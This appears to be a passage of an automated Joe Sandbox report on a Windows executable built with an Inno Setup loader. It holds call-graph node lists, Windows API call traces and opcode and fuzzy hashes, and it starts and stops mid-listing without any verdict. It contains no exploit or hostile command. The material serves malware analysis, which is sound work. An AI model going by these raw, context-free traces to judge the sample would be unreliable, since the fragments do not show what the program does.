405163 6698->6699 6700 404e48 19 API calls 6699->6700 6701 405177 6700->6701 6271 403a52 6272 403a74 6271->6272 6273 403a5a WriteFile 6271->6273 6273->6272 6274 403a78 GetLastError 6273->6274 6274->6272 6275 402654 6276 403154 4 API calls 6275->6276 6277 402614 6276->6277 6278 402632 6277->6278 6279 403154 4 API calls 6277->6279 6278->6278 6279->6278 5646 409e62 5647 409aa0 4 API calls 5646->5647 5648 409e67 5647->5648 5649 409e6c 5648->5649 5749 402f24 5648->5749 5683 4098f4 5649->5683 5652 409ec4 5688 4026c4 GetSystemTime 5652->5688 5654 409e71 5654->5652 5754 408dd8 5654->5754 5655 409ec9 5689 409330 5655->5689 5659 409ea0 5662 409ea8 MessageBoxA 5659->5662 5660 4031e8 4 API calls 5661 409ede 5660->5661 5707 406928 5661->5707 5662->5652 5664 409eb5 5662->5664 5757 405854 5664->5757 5670 
409f0c 5734 403340 5670->5734 5672 409f1a 5673 4031e8 4 API calls 5672->5673 5674 409f2a 5673->5674 5675 4074e0 23 API calls 5674->5675 5676 409f69 5675->5676 5677 402594 4 API calls 5676->5677 5678 409f89 5677->5678 5679 407a28 5 API calls 5678->5679 5680 409fcb 5679->5680 5681 407cb8 21 API calls 5680->5681 5682 409ff2 5681->5682 5761 40953c 5683->5761 5688->5655 5698 409350 5689->5698 5692 409375 CreateDirectoryA 5693 4093ed 5692->5693 5694 40937f GetLastError 5692->5694 5695 40322c 4 API calls 5693->5695 5694->5698 5696 4093f7 5695->5696 5699 4031b8 4 API calls 5696->5699 5697 408dd8 4 API calls 5697->5698 5698->5692 5698->5697 5703 407284 5 API calls 5698->5703 5706 405880 4 API calls 5698->5706 5853 406cf4 5698->5853 5876 409224 5698->5876 5895 404c84 5698->5895 5898 408da8 5698->5898 5701 409411 5699->5701 5702 4031b8 4 API calls 5701->5702 5704 40941e 5702->5704 5703->5698 5704->5660 5706->5698 6008 406820 5707->6008 5710 403454 4 API calls 5711 40694a 5710->5711 5712 4066c0 5711->5712 6013 4068e4 5712->6013 5715 4066f0 5718 403340 4 API calls 5715->5718 5716 4066fe 5717 403454 4 API calls 5716->5717 5720 406711 5717->5720 5719 4066fc 5718->5719 5722 403198 4 API calls 5719->5722 5721 403340 4 API calls 5720->5721 5721->5719 5723 406733 5722->5723 5724 406638 5723->5724 5725 406642 5724->5725 5726 406665 5724->5726 6019 406950 5725->6019 5728 40322c 4 API calls 5726->5728 5730 40666e 5728->5730 5729 406649 5729->5726 5731 406654 5729->5731 5730->5670 5732 403340 4 API calls 5731->5732 5733 406662 5732->5733 5733->5670 5735 403344 5734->5735 5736 4033a5 5734->5736 5737 4031e8 5735->5737 5738 40334c 5735->5738 5739 4031fc 5737->5739 5742 403254 4 API calls 5737->5742 5738->5736 5740 40335b 5738->5740 5743 4031e8 4 API calls 5738->5743 5741 403228 5739->5741 5745 4025ac 4 API calls 5739->5745 5744 403254 4 API calls 5740->5744 5741->5672 5742->5739 5743->5740 5746 403375 5744->5746 5745->5741 5747 4031e8 4 API calls 5746->5747 5748 4033a1 5747->5748 5748->5672 

                                                                                                      Control-flow Graph
                                                                                                      APIs
                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                                      • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                                      • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2441996862-0
                                                                                                      • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                      • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                                      • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                      • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                                      APIs
                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                      • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                                      • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                      • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                      • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                      • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                      • API String ID: 3256987805-3653653586
                                                                                                      • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                      • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                      • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                      • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                                        • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,021B15A4), ref: 0040966C
                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                      • SetWindowLongA.USER32(00020420,000000FC,00409918), ref: 0040A148
                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                      • 73A15CF0.USER32(00020420,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                      • API String ID: 3341979996-3001827809
                                                                                                      • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                                      • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                                                                      • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                                      • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                      • API String ID: 1646373207-2130885113
                                                                                                      • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                                      • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                                                      • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                                      • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                      • SetWindowLongA.USER32(00020420,000000FC,00409918), ref: 0040A148
                                                                                                        • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                                        • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021B15A4,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                        • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021B15A4,00409A90,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                        • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                        • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021B15A4,00409A90), ref: 00409A5C
                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                      • 73A15CF0.USER32(00020420,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                      • API String ID: 978128352-3001827809
                                                                                                      • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                                                      • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                                                                      • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                                                      • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021B15A4,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021B15A4,00409A90,00000000), ref: 00409A28
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                      • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021B15A4,00409A90), ref: 00409A5C
                                                                                                        • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,021B15A4), ref: 0040966C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                      • String ID: D
                                                                                                      • API String ID: 3356880605-2746444292
                                                                                                      • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                                                      • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                                                      • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                                                      • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: .tmp$y@
                                                                                                      • API String ID: 2030045667-2396523267
                                                                                                      • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                                                      • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                                                                      • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                                                      • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: .tmp$y@
                                                                                                      • API String ID: 2030045667-2396523267
                                                                                                      • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                                                      • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                                                                      • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                                                      • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID: .tmp
                                                                                                      • API String ID: 1375471231-2986845003
                                                                                                      • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                                                      • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                                                                      • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                                                      • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5

                                                                                                      Control-flow Graph
                                                                                                      control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 324 4076e8-4076ea call 40748c 322->324 325 4076ef-4076f2 322->325 326 407770-407785 323->326 324->325 328 407700-407704 325->328 329 4076f4-4076fb call 4073ec 325->329 330 407787 326->330 331 4077f9 326->331 329->328 332 40778a-40778f 330->332 333 4077fd-407802 330->333 334 40783b-40783d 331->334 335 4077fb 331->335 338 407803-407819 332->338 340 407791-407792 332->340 333->338 339 407841-407843 334->339 335->333 341 40785b-40785c 338->341 349 40781b 338->349 339->341 344 407724-407741 340->344 345 407794-4077b4 340->345 342 4078d6-4078eb call 407890 InterlockedExchange 341->342 343 40785e-40788c 341->343 366 407912-407917 342->366 367 4078ed-407910 342->367 359 407820-407823 343->359 360 407890-407893 343->360 348 4077b5 344->348 350 407743 344->350 345->348 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 356 407746-407747 350->356 357 4077b9 350->357 353->357 354->331 355->359 356->321 361 4077bb-4077cd 356->361 357->361 363 407898 359->363 364 407824 359->364 360->363 361->339 365 4077cf-4077d4 361->365 368 40789a 363->368 364->368 369 407825 364->369 365->334 374 4077d6-4077de 365->374 367->366 367->367 371 40789f 368->371 372 407896-407897 369->372 373 407826-40782d 369->373 375 4078a1 371->375 372->363 373->375 376 40782f 373->376 374->326 384 4077e0 374->384 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 383 4078ae-4078af 379->383 380->334 380->355 381->383 383->371 385 4078b1-4078bd 383->385 384->354 385->363 386 4078bf-4078c0 385->386
                                                                                                      APIs
                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                      • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                                                      • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                      • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                                                      Control-flow Graph
                                                                                                      control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLibraryLoadMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2987862817-0
                                                                                                      • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                      • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                      • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                      • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

                                                                                                      Control-flow Graph
                                                                                                      control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021A03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                      • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                      • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                      • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                                      Control-flow Graph
                                                                                                      control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                                                      APIs
                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
